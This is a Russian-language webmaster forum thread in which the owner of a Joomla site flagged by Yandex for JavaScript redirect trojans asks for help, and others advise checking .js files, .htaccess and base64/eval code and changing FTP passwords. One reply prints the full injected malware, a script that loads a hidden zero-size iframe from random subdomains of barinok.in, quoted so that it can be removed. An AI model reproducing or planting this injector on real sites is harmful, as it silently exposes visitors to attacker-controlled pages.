[VadimPRO]

Всем привет!
На днях на почту пришло письмо "яндекс обнаружил на сайте seo-top(точка)by вредоносный код"
Сайт содержит Troj/JSRedir-LR, Troj/ExpJS-JU

Никогда не имел дела с таким... прошу помощи у форумчан. Подскажите пожалуйста, что за ерунда такая и как избавиться от этого?

Заранее благодарен за помощь!

[Rubilnik]

Сайт содержит Troj/JSRedir-LR, Troj/ExpJS-JU

Судя по названию это javascript редирект. Обычно такие штуки ставят для того чтобы сливать мобильный трафик через бэкдор. Нужно проверить все файлы с расширением *.js скорее всего ссылки на оные в шаблоне.

---------- Сообщение добавлено 21:57 ---------- Предыдущее 21:56 ----------

VadimPRO, нашел следы странного сайта на главной странице...
_uuroo5pi.barinok.in

[ramazanaman]

Что за движок для начала скажите?

Для того чтобы найти вирус сохраните страницу в html формате и просмотрерите код, обычно или в самом начале или вверху находится вирус. Если сайт на движке, а он вроде как на движке, то просмотрите индексовый файл, там скорей всего добавлен eval64 код, сравните с дистрибутивами движка свой файл.

ps. Какому недоумку могло быть надо сунуть вирус на такой сайт?? У меня софтовые постоянно ломают и пихают интсалмонстер, мидлеты и прочее.

[ohmygod]

Не забудьте проверить .htaccess на предмет мобильных редиректов.

[*RU*]

как избавиться от этого

могу удалить, обратись по контактам в скайп или аську

[slovoblud]

ищите в коде страницы сами ссылки, потом смотрите как они выводятся, просматривайте соответствующие файлы, ищите в них подозрительную дрянь вроде бейс64, удаляйте, потом обновляйте движок, меняйте пароли фтп и т.п.
Либо обращайтесь к специалистам.

[VadimPRO]

Спасибо ребята!) Блин вот угораздило же на такую хрень попасть... Трафика сразу вообще не стало...

---------- Сообщение добавлено 23:32 ---------- Предыдущее 23:29 ----------

ramazanaman, Движок Joomla 2.5.8

[Гендальф Серый]

Посмотрите здесь - лекарство должно помочь, если eval(base64...

[VadimPRO]

Гендальф Серый, Спасибо, попробую ваш скрипт

[Gunkin]

1. в файле

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

вирусный код надо убрать или восстановить с бекапа:

PHP код:

var ifoe2Xu = document.createElement('iframe');ifoe2Xu.name = 'ifoe2Xu';ifoe2Xu.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'barinok.in/';ifoe2Xu.style.width = '0px';ifoe2Xu.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifoe2Xu=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifoe2Xu);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifoe2Xu=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;} 


2. поменять все пароли ftp.
вроде все)